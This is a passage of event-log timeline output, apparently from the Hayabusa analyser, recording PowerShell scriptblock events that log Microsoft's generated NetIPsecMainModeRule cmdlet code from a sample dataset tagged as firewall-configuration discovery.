'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] 
param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
